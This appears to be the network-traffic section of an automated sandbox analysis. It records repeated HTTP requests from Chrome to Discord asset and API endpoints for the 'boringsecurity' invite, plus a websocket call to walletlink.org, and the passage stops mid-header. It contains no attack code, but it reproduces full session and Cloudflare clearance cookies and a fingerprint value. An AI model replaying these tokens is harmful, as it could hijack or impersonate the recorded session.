Source: global trafficHTTP traffic detected: GET /assets/321a07cbc6f5919dbce9.svg HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; cf_clearance=cE8Hv7FTxAmimhJCgPW3tnzct_sT7t6b7vaRYx7cFgc-1702226722-0-1-bb287ba6.78b28d15.ec292446-0.2.1702226722; _cfuvid=mk2WwAmSuizV15bk0ZcVVPcnJ3_HQ1ogBfDYXb3juE0-1702226723672-0-604800000
Source: global trafficHTTP traffic detected: GET /rpc HTTP/1.1Host: www.walletlink.orgConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://boringsecurity.comSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: sE1HzQYebrE7uILRd7wTnA==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
Source: global trafficHTTP traffic detected: GET /assets/a826e445dff97cf15335.svg HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; cf_clearance=cE8Hv7FTxAmimhJCgPW3tnzct_sT7t6b7vaRYx7cFgc-1702226722-0-1-bb287ba6.78b28d15.ec292446-0.2.1702226722; _cfuvid=0t.4xUOg5ozt2pJJjJCIRtpRzcxSLuPznPL9LgCsw_A-1702226723898-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/1f3e315f020ed5635dc1.svg HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; cf_clearance=cE8Hv7FTxAmimhJCgPW3tnzct_sT7t6b7vaRYx7cFgc-1702226722-0-1-bb287ba6.78b28d15.ec292446-0.2.1702226722; _cfuvid=1f025rEmS7Dx6uNbVlMg2z8U3BqF2p9yKs9d2xZaDyk-1702226723931-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/1af9bdf041e000508e41.svg HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; cf_clearance=cE8Hv7FTxAmimhJCgPW3tnzct_sT7t6b7vaRYx7cFgc-1702226722-0-1-bb287ba6.78b28d15.ec292446-0.2.1702226722; _cfuvid=6RuDu4mp_POUyrmMrOVpEny.UdK_gp.iChTAdPSizpE-1702226723991-0-604800000
Source: global trafficHTTP traffic detected: GET /api/v9/invites/boringsecurity?with_counts=true&with_expiration=true HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"X-Super-Properties: eyJvcyI6IldpbmRvd3MiLCJicm93c2VyIjoiQ2hyb21lIiwiZGV2aWNlIjoiIiwic3lzdGVtX2xvY2FsZSI6ImVuLVVTIiwiYnJvd3Nlcl91c2VyX2FnZW50IjoiTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzExNy4wLjAuMCBTYWZhcmkvNTM3LjM2IiwiYnJvd3Nlcl92ZXJzaW9uIjoiMTE3LjAuMC4wIiwib3NfdmVyc2lvbiI6IjEwIiwicmVmZXJyZXIiOiIiLCJyZWZlcnJpbmdfZG9tYWluIjoiIiwicmVmZXJyZXJfY3VycmVudCI6IiIsInJlZmVycmluZ19kb21haW5fY3VycmVudCI6IiIsInJlbGVhc2VfY2hhbm5lbCI6InN0YWJsZSIsImNsaWVudF9idWlsZF9udW1iZXIiOjI1Mjk2NiwiY2xpZW50X2V2ZW50X3NvdXJjZSI6bnVsbH0=X-Fingerprint: 1183449386894770317.ims3tmo8uZKLFPG2Q4wQClw3WasX-Debug-Options: bugReporterEnabledsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36X-Discord-Timezone: Europe/ZurichX-Discord-Locale: en-USsec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; cf_clearance=cE8Hv7FTxAmimhJCgPW3tnzct_sT7t6b7vaRYx7cFgc-1702226722-0-1-bb287ba6.78b28d15.ec292446-0.2.1702226722; _cfuvid=uymERFs01dlt38UGn5iqWw3JHnSCmXqgawSYEADAVao-1702226724003-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/7442b576347c1d02886f.svg HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; cf_clearance=cE8Hv7FTxAmimhJCgPW3tnzct_sT7t6b7vaRYx7cFgc-1702226722-0-1-bb287ba6.78b28d15.ec292446-0.2.1702226722; _cfuvid=uymERFs01dlt38UGn5iqWw3JHnSCmXqgawSYEADAVao-1702226724003-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/321a07cbc6f5919dbce9.svg HTTP/1.1Host: discord.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; cf_clearance=cE8Hv7FTxAmimhJCgPW3tnzct_sT7t6b7vaRYx7cFgc-1702226722-0-1-bb287ba6.78b28d15.ec292446-0.2.1702226722; _cfuvid=5Oj0OnZQ0lRz.YU1RxxIZMDBy.vsd66.lBMtqZ.Wfzo-1702226724507-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/a826e445dff97cf15335.svg HTTP/1.1Host: discord.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; cf_clearance=cE8Hv7FTxAmimhJCgPW3tnzct_sT7t6b7vaRYx7cFgc-1702226722-0-1-bb287ba6.78b28d15.ec292446-0.2.1702226722; _cfuvid=5Oj0OnZQ0lRz.YU1RxxIZMDBy.vsd66.lBMtqZ.Wfzo-1702226724507-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/1f3e315f020ed5635dc1.svg HTTP/1.1Host: discord.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; cf_clearance=cE8Hv7FTxAmimhJCgPW3tnzct_sT7t6b7vaRYx7cFgc-1702226722-0-1-bb287ba6.78b28d15.ec292446-0.2.1702226722; _cfuvid=5Oj0OnZQ0lRz.YU1RxxIZMDBy.vsd66.lBMtqZ.Wfzo-1702226724507-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/3205da2e8f78633583d0.svg HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; cf_clearance=cE8Hv7FTxAmimhJCgPW3tnzct_sT7t6b7vaRYx7cFgc-1702226722-0-1-bb287ba6.78b28d15.ec292446-0.2.1702226722; _cfuvid=uymERFs01dlt38UGn5iqWw3JHnSCmXqgawSYEADAVao-1702226724003-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/8f581f91e7e650ac87a2.svg HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; cf_clearance=cE8Hv7FTxAmimhJCgPW3tnzct_sT7t6b7vaRYx7cFgc-1702226722-0-1-bb287ba6.78b28d15.ec292446-0.2.1702226722; _cfuvid=vy2SOoFIazLkclN_hzdgnccOM4x55DI6.XQfVv9iLQw-1702226724746-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/44d5e1639bc492dc8d62.svg HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; cf_clearance=cE8Hv7FTxAmimhJCgPW3tnzct_sT7t6b7vaRYx7cFgc-1702226722-0-1-bb287ba6.78b28d15.ec292446-0.2.1702226722; _cfuvid=vy2SOoFIazLkclN_hzdgnccOM4x55DI6.XQfVv9iLQw-1702226724746-0-604800000
Source: global trafficHTTP traffic detected: GET /api/v9/auth/location-metadata HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"X-Super-Properties: eyJvcyI6IldpbmRvd3MiLCJicm93c2VyIjoiQ2hyb21lIiwiZGV2aWNlIjoiIiwic3lzdGVtX2xvY2FsZSI6ImVuLVVTIiwiYnJvd3Nlcl91c2VyX2FnZW50IjoiTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzExNy4wLjAuMCBTYWZhcmkvNTM3LjM2IiwiYnJvd3Nlcl92ZXJzaW9uIjoiMTE3LjAuMC4wIiwib3NfdmVyc2lvbiI6IjEwIiwicmVmZXJyZXIiOiIiLCJyZWZlcnJpbmdfZG9tYWluIjoiIiwicmVmZXJyZXJfY3VycmVudCI6IiIsInJlZmVycmluZ19kb21haW5fY3VycmVudCI6IiIsInJlbGVhc2VfY2hhbm5lbCI6InN0YWJsZSIsImNsaWVudF9idWlsZF9udW1iZXIiOjI1Mjk2NiwiY2xpZW50X2V2ZW50X3NvdXJjZSI6bnVsbH0=X-Fingerprint: 1183449386894770317.ims3tmo8uZKLFPG2Q4wQClw3WasX-Debug-Options: bugReporterEnabledsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36X-Discord-Timezone: Europe/ZurichX-Discord-Locale: en-USsec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; cf_clearance=cE8Hv7FTxAmimhJCgPW3tnzct_sT7t6b7vaRYx7cFgc-1702226722-0-1-bb287ba6.78b28d15.ec292446-0.2.1702226722; _cfuvid=9Vr07dmk9BjeMAFxkOqVE2D8M2Cr8A_AMnLsBCJOnx4-1702226725134-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/20ac37ed2576dd48d7dc.woff2 HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://discord.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://discord.com/assets/app.83f01b3df65cd0fa3bb9.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; cf_clearance=cE8Hv7FTxAmimhJCgPW3tnzct_sT7t6b7vaRYx7cFgc-1702226722-0-1-bb287ba6.78b28d15.ec292446-0.2.1702226722; _cfuvid=9Vr07dmk9BjeMAFxkOqVE2D8M2Cr8A_AMnLsBCJOnx4-1702226725134-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/1af9bdf041e000508e41.svg HTTP/1.1Host: discord.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; cf_clearance=cE8Hv7FTxAmimhJCgPW3tnzct_sT7t6b7vaRYx7cFgc-1702226722-0-1-bb287ba6.78b28d15.ec292446-0.2.1702226722; _cfuvid=9Vr07dmk9BjeMAFxkOqVE2D8M2Cr8A_AMnLsBCJOnx4-1702226725134-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/7442b576347c1d02886f.svg HTTP/1.1Host: discord.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; cf_clearance=cE8Hv7FTxAmimhJCgPW3tnzct_sT7t6b7vaRYx7cFgc-1702226722-0-1-bb287ba6.78b28d15.ec292446-0.2.1702226722; _cfuvid=9Vr07dmk9BjeMAFxkOqVE2D8M2Cr8A_AMnLsBCJOnx4-1702226725134-0-604800000
Source: global trafficHTTP traffic detected: GET /api/v9/invites/boringsecurity?with_counts=true&with_expiration=true HTTP/1.1Host: discord.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; cf_clearance=cE8Hv7FTxAmimhJCgPW3tnzct_sT7t6b7vaRYx7cFgc-1702226722-0-1-bb287ba6.78b28d15.ec292446-0.2.1702226722; _cfuvid=9Vr07dmk9BjeMAFxkOqVE2D8M2Cr8A_AMnLsBCJOnx4-1702226725134-0-604800000
Source: global trafficHTTP traffic detected: GET /icons/933253328794689546/9b0ad1a7a2c911684a0e7e6e1e7bce2e.webp?size=64 HTTP/1.1Host: cdn.discordapp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://discord.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/3205da2e8f78633583d0.svg HTTP/1.1Host: discord.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; cf_clearance=cE8Hv7FTxAmimhJCgPW3tnzct_sT7t6b7vaRYx7cFgc-1702226722-0-1-bb287ba6.78b28d15.ec292446-0.2.1702226722; _cfuvid=GSJjpmAXxKT83YB.7it6A3TWLo4rdfvbJida.TIzSS0-1702226725396-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/8f581f91e7e650ac87a2.svg HTTP/1.1Host: discord.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; cf_clearance=cE8Hv7FTxAmimhJCgPW3tnzct_sT7t6b7vaRYx7cFgc-1702226722-0-1-bb287ba6.78b28d15.ec292446-0.2.1702226722; _cfuvid=GSJjpmAXxKT83YB.7it6A3TWLo4rdfvbJida.TIzSS0-1702226725396-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/44d5e1639bc492dc8d62.svg HTTP/1.1Host: discord.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; cf_clearance=cE8Hv7FTxAmimhJCgPW3tnzct_sT7t6b7vaRYx7cFgc-1702226722-0-1-bb287ba6.78b28d15.ec292446-0.2.1702226722; _cfuvid=pqq30mwFe9GP6e.YgyxFZDUBHWxc0QwVNM5t4WjwElo-1702226725605-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/b9811218b3a54ad59fb2.woff2 HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://discord.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://discord.com/assets/app.83f01b3df65cd0fa3bb9.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; cf_clearance=cE8Hv7FTxAmimhJCgPW3tnzct_sT7t6b7vaRYx7cFgc-1702226722-0-1-bb287ba6.78b28d15.ec292446-0.2.1702226722; _cfuvid=zTyHcYXle.ulldoKhDyuZdpCFGGhUOczyQR6YErOS08-1702226725668-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/3f46bbecb4287c0a829f.woff2 HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://discord.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://discord.com/assets/app.83f01b3df65cd0fa3bb9.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; 